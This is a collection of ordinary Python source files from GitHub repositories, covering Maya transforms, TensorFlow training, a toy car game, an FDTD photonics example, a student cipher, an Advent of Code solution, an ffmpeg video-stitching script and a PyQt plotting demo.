axis='xy'):\n \"\"\"Mirror the transform by selecting the top item and top target\n\n Arguments:\n axis_ (axis): 'xy', 'xz', 'yx', 'yz', 'zx', 'zy'\n\n Returns:\n matrix : transform mirror\n\n \"\"\"\n if axis == 'xy':\n pAxis_ = 'x'\n rAxis_ = 'x'\n r2Axis_ = 'y'\n \n elif axis == 'xz':\n pAxis_ = 'x'\n rAxis_ = 'x'\n r2Axis_ = 'z'\n elif axis == 'yx':\n pAxis_ = 'y'\n rAxis_ = 'y'\n r2Axis_ = 'x'\n \n elif axis == 'yz':\n pAxis_ = 'y'\n rAxis_ = 'y'\n r2Axis_ = 'z'\n \n elif axis == 'zx':\n pAxis_ = 'z'\n rAxis_ = 'z'\n r2Axis_ = 'x'\n \n elif axis == 'zy':\n pAxis_ = 'z'\n rAxis_ = 'z'\n r2Axis_ = 'y'\n \n for i,item in enumerate(items): \n matrix_ = item.getMatrix(worldSpace=True)\n \n matrix_ = mirrorMatrix_(matrix_, axis_=pAxis_, type_='flip')\n if i>0:\n PInvMatrix_ = getInverseTransform(targets[i].getParent())\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n \n localmatrix_ = targets[i].getMatrix(worldSpace=True)\n \n matrix_ = mirrorMatrix_(localmatrix_, axis_=rAxis_, type_='rot')\n if i>0:\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n \n matrix_ = mirrorMatrix_(localmatrix_, axis_=r2Axis_, type_='rot')\n if i>0:\n matrix_ = getMultMatrix(matrix_, PInvMatrix_)\n targets[i].setMatrix(matrix_)\n makeIdentity(targets[i], apply=1, t=0, r=1, s=1, n=0, pn=1)\n\ndef getLocalTrans(object_):\n items, targets = divide_in_two(object_)\n for i,item in enumerate(items):\n wm_ = item.getMatrix(worldSpace=True)\n targetParent_ = targets[i].getParent()\n wim_ = targetParent_.getMatrix(worldSpace=True).inverse()\n multM_ = wm_*wim_\n getLocalTrans_ = multM_[-1][:-1]\n return getLocalTrans_.get()\n\ndef getTransformLookingAt(pos, lookat, normal, axis=\"xy\", negate=False):\n \"\"\"Return a transformation mstrix using vector positions.\n Return the transformation matrix of the dagNode oriented looking to\n an specific point.\n Arguments:\n pos (vector): The position for the transformation\n lookat (vector): The aiming position to stablish the orientation\n normal (vector): The normal control the transformation roll.\n axis (str): The 2 axis used for lookat and normal. Default \"xy\"\n negate (bool): If true, invert the aiming direction.\n Returns:\n matrix: The transformation matrix\n >>> t = tra.getTransformLookingAt(self.guide.pos[\"heel\"],\n self.guide.apos[-4],\n self.normal,\n \"xz\",\n self.negate)\n \"\"\"\n normal.normalize()\n\n if negate:\n a = pos - lookat\n else:\n a = lookat - pos\n\n a.normalize()\n c = util.cross(a, normal)\n c.normalize()\n b = util.cross(c, a)\n b.normalize()\n\n if axis == \"xy\":\n X = a\n Y = b\n Z = c\n elif axis == \"xz\":\n X = a\n Z = b\n Y = -c\n elif axis == \"yx\":\n Y = a\n X = b\n Z = -c\n elif axis == \"yz\":\n Y = a\n Z = b\n X = c\n elif axis == \"zx\":\n Z = a\n X = b\n Y = c\n elif axis == \"z-x\":\n Z = a\n X = -b\n Y = -c\n elif axis == \"zy\":\n Z = a\n Y = b\n X = -c\n\n elif axis == \"x-y\":\n X = a\n Y = -b\n Z = -c\n elif axis == \"-xz\":\n X = -a\n Z = b\n Y = c\n elif axis == \"-xy\":\n X = -a\n Y = b\n Z = c\n\n m = dt.Matrix()\n m[0] = [X[0], X[1], X[2], 0.0]\n m[1] = [Y[0], Y[1], Y[2], 0.0]\n m[2] = [Z[0], Z[1], Z[2], 0.0]\n m[3] = [pos[0], pos[1], pos[2], 1.0]\n\n return m","repo_name":"smsyes/pythonWorkSpace","sub_path":"main/mApplication/ms_module/maya/python3/rigSupport/lib/_transform.py","file_name":"_transform.py","file_ext":"py","file_size_in_byte":9608,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"}
+{"seq_id":"42196857355","text":"import time\n\nimport tensorflow as tf\n\nfrom models.alexnet import AlexNet\nfrom models.vgg import VGG\nfrom models.googlenet import GoogLeNet\nfrom models.resnet import ResNet\nfrom models.inception_v2 import InceptionV2\nfrom models.inception_v3 import InceptionV3\nfrom trainers.predefined_loss import *\n\nclass ClfTrainer:\n def __init__(self, clf_model, clf_dataset):\n self.clf_model = clf_model\n self.clf_dataset = clf_dataset\n\n def __run_train__(self, sess, input, output,\n batch_i, batch_size,\n cost_func, train_op,\n scale_to_imagenet=False):\n\n total_loss = 0\n count = 0\n\n for batch_features, batch_labels in self.clf_dataset.get_training_batches_from_preprocessed(batch_i, batch_size, scale_to_imagenet):\n loss, _ = sess.run([cost_func, train_op],\n feed_dict={input: batch_features,\n output: batch_labels})\n total_loss = total_loss + loss\n count = count + 1\n\n return total_loss/count\n\n def __run_accuracy_in_valid_set__(self, sess, input, output, accuracy, batch_size, scale_to_imagenet=False):\n valid_features, valid_labels = self.clf_dataset.get_valid_set(scale_to_imagenet)\n\n valid_acc = 0\n for batch_valid_features, batch_valid_labels in self.clf_dataset.get_batches_from(valid_features, valid_labels, batch_size):\n valid_acc += sess.run(accuracy,\n feed_dict={input:batch_valid_features,\n output:batch_valid_labels})\n\n tmp_num = valid_features.shape[0]/batch_size\n return valid_acc/tmp_num\n\n def __train__(self, input, output,\n cost_func, train_op, accuracy,\n epochs, batch_size, save_model_path,\n save_every_epoch=1):\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost_func, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver = tf.train.Saver()\n saver.save(sess, save_model_path, global_step=epoch+1, write_meta_graph=False)\n\n def __get_simple_losses_and_accuracy__(self, out_layers, output, learning_rate, options=None):\n is_loss_weights_considered = False\n label_smoothings = [0 for i in range(len(out_layers))]\n\n if options is not None:\n if 'loss_weights' in options and \\\n len(options['loss_weights']) is len(out_layers):\n is_loss_weights_considered = True\n\n if 'label_smoothings' in options and \\\n len(options['label_smoothings']) is len(out_layers):\n label_smoothings = options['label_smoothings']\n\n aux_cost_sum = 0\n if is_loss_weights_considered:\n for i in range(len(out_layers) - 1):\n aux_out_layer = out_layers[i]\n aux_label_smoothing = label_smoothings[i]\n aux_cost = tf.losses.softmax_cross_entropy(output, aux_out_layer, label_smoothing=aux_label_smoothing, reduction=tf.losses.Reduction.MEAN)\n aux_cost_sum += aux_cost * options['loss_weights'][i]\n\n final_out_layer = out_layers[len(out_layers)-1]\n final_label_smoothing = label_smoothings[len(out_layers)-1]\n cost = tf.losses.softmax_cross_entropy(output, final_out_layer, label_smoothing=final_label_smoothing, reduction=tf.losses.Reduction.MEAN)\n\n if is_loss_weights_considered:\n cost = cost * options['loss_weights'][len(out_layers)-1]\n\n optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\n gradients = optimizer.compute_gradients(cost+aux_cost_sum)\n train_op = optimizer.apply_gradients(gradients)\n\n correct_pred = tf.equal(tf.argmax(final_out_layer, 1), tf.argmax(output, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n return cost, train_op, accuracy\n\n def __get_losses_and_accuracy__(self, model, output, out_layers, learning_rate, options=None):\n from_paper_flag = True\n\n if options is None or options['optimizer_from_paper'] is False:\n optimizer_from_paper_flag = False\n\n if isinstance(model, AlexNet):\n return get_alexnet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, VGG):\n return get_vgg_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, GoogLeNet):\n return get_googlenet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, {'loss_weights': [0.3, 0.3, 1.0]})\n elif isinstance(model, ResNet):\n return get_resnet_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, None)\n elif isinstance(model, InceptionV2):\n return get_inceptionv2_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, {'loss_weights': [0.4, 1.0]})\n elif isinstance(model, InceptionV3):\n return get_inceptionv3_trainer(output, out_layers, learning_rate) if optimizer_from_paper_flag else \\\n self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, {'loss_weights': [0.4, 1.0], 'label_smoothings': [0.1, 0.1]})\n else:\n return self.__get_simple_losses_and_accuracy__(out_layers, output, learning_rate, options)\n\n # default to use AdamOptimizer w/ softmax_cross_entropy_with_logits_v2\n def run_training(self,\n epochs, batch_size, learning_rate,\n save_model_to, save_every_epoch=1,\n options=None):\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n self.__train__(input, output,\n cost, train_op, accuracy,\n epochs, batch_size,\n save_model_to, save_every_epoch)\n\n def resume_training_from_ckpt(self, epochs, batch_size, learning_rate, save_model_from, save_model_to, save_every_epoch=1, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver(tf.trainable_variables())\n saver.restore(sess, save_model_from)\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver1 = tf.train.Saver()\n saver1.save(sess, save_model_to, global_step=epoch+1, write_meta_graph=False)\n\n def run_transfer_learning(self,\n epochs, batch_size, learning_rate,\n save_model_from, save_model_to, save_every_epoch=1, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, output = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n cost, train_op, accuracy = self.__get_losses_and_accuracy__(self.clf_model, output, out_layers, learning_rate)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n var_list = []\n for var in tf.model_variables():\n if 'final' not in var.name:\n var_list.append(var)\n\n saver = tf.train.Saver(var_list)\n saver.restore(sess, save_model_from)\n\n print('starting training ... ')\n for epoch in range(epochs):\n n_batches = self.clf_dataset.num_batch\n\n for batch_i in range(1, n_batches + 1):\n loss = self.__run_train__(sess,\n input, output,\n batch_i, batch_size,\n cost, train_op,\n self.clf_model.scale_to_imagenet)\n print('Epoch {:>2}, {} Batch {}: '.format(epoch + 1, self.clf_dataset.name, batch_i), end='')\n print('Avg. Loss: {} '.format(loss), end='')\n\n valid_acc = self.__run_accuracy_in_valid_set__(sess,\n input, output,\n accuracy, batch_size,\n self.clf_model.scale_to_imagenet)\n print('Validation Accuracy {:.6f}'.format(valid_acc))\n\n if epoch % save_every_epoch == 0:\n print('epoch: {} is saved...'.format(epoch+1))\n saver2 = tf.train.Saver()\n saver2.save(sess, save_model_to, global_step=epoch+1, write_meta_graph=False)\n\n def run_testing(self,\n data, save_model_from, options=None):\n graph = tf.Graph()\n with graph.as_default():\n input, _ = self.clf_model.set_dataset(self.clf_dataset)\n out_layers = self.clf_model.create_model(input)\n\n final_out_layer = out_layers[len(out_layers)-1]\n softmax_result = tf.nn.softmax(final_out_layer)\n\n with tf.Session(graph=graph) as sess:\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver(tf.trainable_variables())\n saver.restore(sess, save_model_from)\n\n results = sess.run(softmax_result,\n feed_dict={input:data})\n\n return results\n","repo_name":"deep-diver/DeepModels","sub_path":"trainers/clftrainer.py","file_name":"clftrainer.py","file_ext":"py","file_size_in_byte":12924,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"16"}
+{"seq_id":"3595623474","text":"car_running = False\nwhile True:\n mp = input(\">\")\n if mp.lower() == \"help\":\n print('''start - to start the car \nstop - to stop the car \nquit - to exit''')\n elif mp == \"start\":\n if not car_running:\n car_running = True\n print(\"Car started...Ready to go!\")\n else:\n print(\"Car's already started, what are you doing ?\")\n elif mp == \"stop\":\n if car_running:\n car_running = False\n print(\"car stopped.\")\n else:\n print(\"car was not running, cannot be stopped\")\n elif mp == \"quit\":\n print(\"thank you for using this products\")\n break\n else:\n # continue while loop\n print(\"I don't understand that...\")\n","repo_name":"redDevil1UR/helloworld","sub_path":"car_game.py","file_name":"car_game.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"43590040634","text":"import utils\nfrom photfdtd import Ring, Grid, Solve\n\nif __name__ == \"__main__\":\n\n background_index = 1.0\n\n ring = Ring(\n outer_radius=100,\n zlength=20,\n x=150,\n y=150,\n z=13,\n width=20,\n length=0,\n gap=5,\n name=\"ring\",\n refractive_index=3.47,\n direction=1,\n background_index=background_index\n )\n\n grid = Grid(grid_xlength=300, grid_ylength=300, grid_zlength=25, grid_spacing=20e-9, total_time=1000,\n pml_width_x=50, pml_width_y=20, pml_width_z=1,\n permittivity=background_index ** 2, foldername=\"test_ring\")\n\n grid.set_source(\n source_type=\"planesource\",\n x=100,\n xlength=0,\n y=35,\n ylength=21,\n pulse_type=\"None\",\n z=13,\n zlength=22,\n period=1550e-9 / 299792458,\n )\n\n grid.set_detector(detector_type=\"blockdetector\",\n x=250,\n xlength=0,\n y=37,\n ylength=21,\n z=13,\n zlength=22,\n name=\"detector\")\n\n grid.add_object(ring)\n\n # 创建solve对象\n solve = Solve(grid=grid)\n\n solve._plot_(axis='z',\n index=13,\n filepath=grid.folder)\n\n grid.run()\n\n grid.save_simulation()\n\n grid.save_fig(axis=\"z\",\n axis_number=13)\n grid.save_fig(axis=\"x\",\n axis_number=150)\n\n data = Grid.read_simulation(folder=grid.folder)\n","repo_name":"phot-lab/photfdtd","sub_path":"examples/ring_ex.py","file_name":"ring_ex.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"}
+{"seq_id":"17337429484","text":"from typing import Any, Callable, Pattern, Set, Type, Generator\nimport os\nfrom passlib.hash import pbkdf2_sha256\n\n\nclass BaseUtils:\n\n @classmethod\n def all_base_classes(cls, class_: Type) -> Set:\n base_class_set = set(class_.__bases__)\n all_base_class_set = {class_}\n all_base_class_set.update(base_class_set)\n for base in base_class_set:\n all_base_class_set.update(cls.all_base_classes(base))\n return all_base_class_set\n\n @classmethod\n def walk_all_parent_dirs(cls, path: str) -> Generator:\n \"\"\"\n Yield directories starting from the given directory up to the root\n \"\"\"\n if not os.path.exists(path):\n raise IOError(\"Starting path not found\")\n\n if os.path.isfile(path):\n path = os.path.dirname(path)\n\n last_dir = None\n current_dir = os.path.abspath(path)\n while last_dir != current_dir:\n yield current_dir\n parent_dir = os.path.abspath(os.path.join(current_dir, os.path.pardir))\n last_dir, current_dir = current_dir, parent_dir\n","repo_name":"mo1ein/feedbook","sub_path":"src/utils/base_utils.py","file_name":"base_utils.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"25158168515","text":"import string\nimport math\n\ndef baris_maks(panjang_plaintext):\n pola1 = 1\n pola2 = 2 \n while (pola1 < panjang_plaintext):\n pola1 = pola1 + pola2\n return math.ceil(math.sqrt(pola1))\n\n\ndef enkripsi(barismaks, plaintext, kolom, baris):\n array = [['' for y in range(int(kolom))] for x in range(int(baris))]\n penghitung_string = 0\n hasil_enkripsi = ''\n dikunjungi = [False for x in range(kolom)]\n\n for i in range(int(baris)):\n kolom_mulai = baris - i - 1\n for j in range(int(kolom)):\n if (j >= kolom_mulai and j < kolom - kolom_mulai) and len(plaintext) >= penghitung_string: \n if penghitung_string >= len(plaintext):\n array[i][j] = 'x'\n else:\n array[i][j] = plaintext[penghitung_string]\n penghitung_string = penghitung_string + 1\n if penghitung_string == len(plaintext):\n break\n\n for i in range(int(baris)):\n for j in range(int(kolom)):\n if dikunjungi[j] == False:\n for k in range(int(baris)):\n if array[k][j] != '':\n hasil_enkripsi = hasil_enkripsi + array[k][j]\n dikunjungi[j] = True\n else:\n continue\n\n return hasil_enkripsi\n\nc\n\ndef main():\n plaintext = 'ikanhiumakantomat'\n panjang_plaintext = len(plaintext)\n barismaks = baris_maks(panjang_plaintext)\n kolom, baris = 2 * barismaks - 1, barismaks\n print(enkripsi(barismaks, plaintext, kolom, baris))\n\n ciphertext = \"tkxhaxkinxiautxnmoxamxaxx\"\n panjang_ciphertext = len(ciphertext)\n barismaks = baris_maks(panjang_ciphertext)\n kolom, baris = 2 * barismaks - 1, barismaks\n print(dekripsi(barismaks, ciphertext, kolom, baris))\n\nif __name__ == \"__main__\":\n main()","repo_name":"suriadivjr/uasPrakKripto","sub_path":"triangle.py","file_name":"triangle.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37121531945","text":"import itertools\nimport functools\nimport re\nimport math\n\nfrom copy import deepcopy\n\nINPUT_FILE = 'input.txt'\n\ndef read_file(filename, func=None):\n result = []\n with open(filename, 'r') as f:\n for line in f:\n result.append(func(line.strip()) if func else line.strip())\n return result\n\ndef main1():\n lines = read_file(INPUT_FILE)\n position = 0\n depth = 0\n for l in lines:\n inst, value = l.split(' ')\n value = int(value)\n if inst == \"forward\":\n position += value\n elif inst == \"down\":\n depth += value\n else:\n depth -= value\n print(position * depth)\n\ndef main2():\n lines = read_file(INPUT_FILE)\n position = 0\n depth = 0\n aim = 0\n for l in lines:\n inst, value = l.split(' ')\n if inst == \"forward\":\n position += int(value)\n depth += aim * int(value)\n elif inst == \"down\":\n aim += int(value)\n else:\n aim -= int(value)\n print(depth * position)\n \nif __name__ == \"__main__\":\n main1()\n main2()\n","repo_name":"Universemul/AdventOfCode2021","sub_path":"python/day2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27413717564","text":"import os\nimport inspect\nimport click\nimport tempfile\nimport shutil\nimport subprocess\nimport logging\nimport time\n\nimport stitch_common as sc\n\nFILE_ENDING = 'mp4'\nMAX_ATTEMPTS = 3\nLOCAL_FFMPEG_PATH = 'ffmpeg/bin'\n\n\n@click.command()\n@click.argument('root_dir')\n@click.argument('base_out_dir')\n@click.option('--root_tmp_dir', default=None, help='Where tmp folders should be generated')\n@click.option('--rename_on_copy', default=True, is_flag=True)\n@click.option('--local_ffmpeg', default=True, is_flag=True)\ndef stitch_videos(root_dir, base_out_dir, root_tmp_dir, rename_on_copy, local_ffmpeg):\n if root_tmp_dir:\n logging.info('Setting directory where temp folders will be created: \"{}\".'.format(root_tmp_dir))\n os.environ['TMPDIR'] = root_tmp_dir\n\n if local_ffmpeg:\n ffmpeg_path = os.path.join(os.path.dirname(os.path.abspath(inspect.getsourcefile(lambda: 0))),\n LOCAL_FFMPEG_PATH)\n if not os.path.isdir(ffmpeg_path):\n logging.fatal('ffmpeg path is incorrect:'.format(ffmpeg_path))\n else:\n ffmpeg_path = 'ffmpeg'\n\n logging.info('Using ffmpeg: {}'.format(ffmpeg_path))\n\n logging.info('Starting the stitching process.')\n if rename_on_copy:\n logging.info('** Rename on copy mode enabled.')\n # We have a number of renaming strategies:\n # 1) if there is only a single directory that contains the files, assume it is a full trip + set code\n # 2) if there are two directories, assume the first is the trip code and the second the set code\n # 3) if there are three directories, follow assumption (2) and add a stereo L or R directory\n for trip_name in get_subdirs(root_dir):\n trip_path = os.path.join(root_dir, trip_name)\n join_mp4s(trip_path, base_out_dir, '{}.mp4'.format(trip_name), ffmpeg_path)\n for set_name in get_subdirs(trip_path):\n set_path = os.path.join(trip_path, set_name)\n join_mp4s(set_path, base_out_dir, '{}_{}.mp4'.format(trip_name, set_name), ffmpeg_path)\n for camera in get_subdirs(set_path):\n camera_path = os.path.join(set_path, camera)\n if camera.lower().startswith('l'):\n camera_abbrv = 'L'\n elif camera.lower().startswith('r'):\n camera_abbrv = 'R'\n else:\n logging.warning('Unexpected camera folder: {}'.format(camera_path))\n break\n join_mp4s(camera_path, base_out_dir, '{}_{}_{}.mp4'.format(trip_name, set_name, camera_abbrv),\n ffmpeg_path)\n else:\n for root, subdirs, files in os.walk(root_dir):\n directory = remove_prefix(root, root_dir)\n out_dir = base_out_dir + os.path.sep + directory\n out_file_name = 'joined.' + FILE_ENDING\n if os.path.exists(out_file_name):\n logging.warning('***Skipping: \"{}\" already exists'.format(out_file_name))\n else:\n join_mp4s(root, out_dir, out_file_name, ffmpeg_path)\n\n\ndef join_mp4s(in_dir, out_dir, out_file_name, ffmpeg_path):\n files = get_files(in_dir)\n attempt_count = 0\n while attempt_count < MAX_ATTEMPTS:\n attempt_count += 1\n with tempfile.TemporaryDirectory() as tmpdir:\n logging.info('**** Processing folder: {}'.format(in_dir))\n mp4s = sorted([fi for fi in files if not fi.startswith('._')])\n file_text = ''\n # mp4s should be sorted alpha\n for vid in mp4s:\n logging.info('Copying video {}'.format(vid))\n shutil.copyfile(in_dir + os.path.sep + vid, tmpdir + os.path.sep + vid)\n if vid.lower().endswith('.mts'):\n logging.info('Processing mts videos')\n output_name = vid.rsplit('.', 1)\n output_file = output_name[0] + '.mp4'\n mts_to_mp4(tmpdir, ffmpeg_path, vid, output_file)\n file_text += \"file '{}/{}'\\n\".format(tmpdir, output_file)\n else:\n file_text += \"file '{}/{}'\\n\".format(tmpdir, vid)\n if len(mp4s) > 0:\n mp4_list_file = open('{}/mp4_list.txt'.format(tmpdir), 'w')\n mp4_list_file.write(file_text)\n mp4_list_file.close()\n\n concat_mp4s(tmpdir, ffmpeg_path)\n\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n if FILE_ENDING == 'avi':\n mp4_to_avi(tmpdir, ffmpeg_path)\n\n joined_file = tmpdir + os.path.sep + 'joined.' + FILE_ENDING\n if len(sc.get_video_details(joined_file, ffmpeg_path)) == 0:\n logging.error('Joined file is unreadable! Trying again in a minute.')\n time.sleep(60)\n else:\n logging.info('-----------------------------------------')\n # get fps values\n output_result = check_fps(tmpdir, ffmpeg_path, joined_file)\n split_array = output_result.split(\"/\")\n numerator = int(split_array[0])\n denominator = int(split_array[1])\n # do the math\n math = numerator / denominator\n\n if math > 30:\n downsample(tmpdir, ffmpeg_path, joined_file)\n ouput_file = tmpdir + os.path.sep + 'output.' + FILE_ENDING\n logging.info('Copying {} to final location...'.format(ouput_file))\n shutil.copyfile(\n ouput_file,\n os.path.join(out_dir, out_file_name)\n )\n logging.info('Finished folder.\\n')\n break # exit retry loop\n else:\n logging.info('Copying {} to final location...'.format(joined_file))\n shutil.copyfile(\n joined_file,\n os.path.join(out_dir, out_file_name)\n )\n logging.info('Finished folder.\\n')\n break # exit retry loop\n else:\n logging.info('No mp4s found in folder.')\n attempt_count = MAX_ATTEMPTS\n if attempt_count >= MAX_ATTEMPTS:\n logging.error('Giving up after multiple retries trying to stitch {}'.format(in_dir))\n\n\ndef get_subdirs(folder):\n return [xx for xx in os.listdir(folder) if os.path.isdir(os.path.join(folder, xx))]\n\n\ndef get_files(folder):\n return [xx for xx in os.listdir(folder) if os.path.isfile(os.path.join(folder, xx))]\n\n\ndef concat_mp4s(tmpdir, ffmpeg_path):\n logging.info('Concatenating mp4s...')\n run_external_command(\n '{} -f concat -safe 0 -i mp4_list.txt -c copy joined.mp4'.format(os.path.join(ffmpeg_path, 'ffmpeg')),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef mp4_to_avi(tmpdir, ffmpeg_path):\n logging.info('Converting from mp4 to avi...')\n run_external_command(\n '{} -i joined.mp4 -vcodec copy -r 29.97 -an joined.avi'.format(os.path.join(ffmpeg_path, 'ffmpeg')),\n tmpdir)\n\n\ndef mts_to_mp4(tmpdir, ffmpeg_path, input_file, output_file):\n logging.info('Converting from mts to mp4...')\n run_external_command(\n '{} -i {} -vcodec mpeg4 -b:v 15M -acodec libmp3lame -b:a 192k {}'.format(os.path.join(ffmpeg_path, 'ffmpeg'),\n input_file, output_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef avi_to_mp4(tmpdir, ffmpeg_path, input_file, output_file):\n logging.info('Converting from avi to mp4...')\n run_external_command(\n '{} -i {} -c:v libx264 -c:a copy {}'.format(os.path.join(ffmpeg_path, 'ffmpeg'), input_file, output_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef downsample(tmpdir, ffmpeg_path, input_file):\n logging.info('Downsampling...')\n run_external_command(\n '{} -i {} -threads 0 -r 29.97 -y output.mp4'.format(os.path.join(ffmpeg_path, 'ffmpeg'), input_file),\n tmpdir)\n logging.info('-----------------------------------------')\n\n\ndef check_fps(tmpdir, ffmpeg_path, inputfile):\n logging.info('Checking fps...')\n # the shell command\n command = '{} -v error -select_streams v -of default=noprint_wrappers=1:nokey=1 -show_entries stream=r_frame_rate {}'.format(\n os.path.join(ffmpeg_path, 'ffprobe'), inputfile)\n process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=None, shell=True, cwd=tmpdir)\n # Launch the shell command:\n output, error = process.communicate()\n return output.decode(\"utf-8\")\n\n\ndef run_external_command(command, tmpdir):\n subprocess.call(\n command,\n shell=True,\n cwd=tmpdir\n )\n\n\ndef remove_prefix(text, prefix):\n if text.startswith(prefix):\n return text[len(prefix):]\n return text\n\n\nif __name__ == '__main__':\n logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', level=logging.INFO)\n stitch_videos()\n","repo_name":"GlobalFinPrint/video_stitching","sub_path":"bulk_stitch.py","file_name":"bulk_stitch.py","file_ext":"py","file_size_in_byte":9351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16920183580","text":"import sys\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QDockWidget, QWidget, QGridLayout, QSlider, QLabel\nfrom PyQt5.QtCore import Qt\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.backends.backend_qt4agg\n\nclass MainWindow(QMainWindow):\n x = np.arange(1, 100, 0.001)\n delta = 1\n lim = 13\n A1 = np.random.rand(2,2)\n A2 = np.random.rand(2,2)\n b1 = np.array([0, 0])\n b2 = np.array([0, 0])\n\n def __init__(self):\n QMainWindow.__init__(self)\n\n self.figure = plt.figure()\n self.drawing = self.figure.add_subplot(122)\n self.another = self.figure.add_subplot(121)\n self.canvas = matplotlib.backends.backend_qt4agg.FigureCanvasQTAgg(self.figure)\n\n self.setCentralWidget(self.canvas)\n\n dock = QDockWidget(\"Values\")\n self.addDockWidget(Qt.RightDockWidgetArea, dock)\n\n sliders = QWidget()\n sliders_grid = QGridLayout(sliders)\n\n def add_slider(foo, col, row):\n sld = QSlider(Qt.Horizontal, sliders)\n sld.setMinimum(-10)\n sld.setMaximum(10)\n sld.setFocusPolicy(Qt.NoFocus)\n sld.valueChanged[int].connect(foo)\n sld.valueChanged.connect(self.plot)\n sliders_grid.addWidget(sld, row, col)\n\n add_slider(foo=self.a00, col=0, row=0)\n add_slider(foo=self.a01, col=0, row=1)\n add_slider(foo=self.a10, col=0, row=2)\n add_slider(foo=self.a11, col=0, row=3)\n add_slider(foo=self.c00, col=1, row=0)\n add_slider(foo=self.c01, col=1, row=1)\n add_slider(foo=self.c10, col=1, row=2)\n add_slider(foo=self.c11, col=1, row=3)\n add_slider(foo=self.b10, col=2, row=0)\n add_slider(foo=self.b11, col=2, row=1)\n add_slider(foo=self.b20, col=3, row=0)\n add_slider(foo=self.b21, col=3, row=1)\n \n\n dock.setWidget(sliders)\n\n self.plot()\n \n def a00(self, val):\n self.A1[0][0] = val\n\n def a01(self, val):\n self.A1[0][1] = val\n\n def a10(self, val):\n self.A1[1][0] = val\n\n def a11(self, val):\n self.A1[1][1] = val\n\n def c00(self, val):\n self.A2[0][0] = val\n\n def c01(self, val):\n self.A2[0][1] = val\n\n def c10(self, val):\n self.A2[1][0] = val\n\n def c11(self, val):\n self.A2[1][1] = val\n\n def b10(self, val):\n self.b1[0] = val \n\n def b11(self, val):\n self.b1[1] = 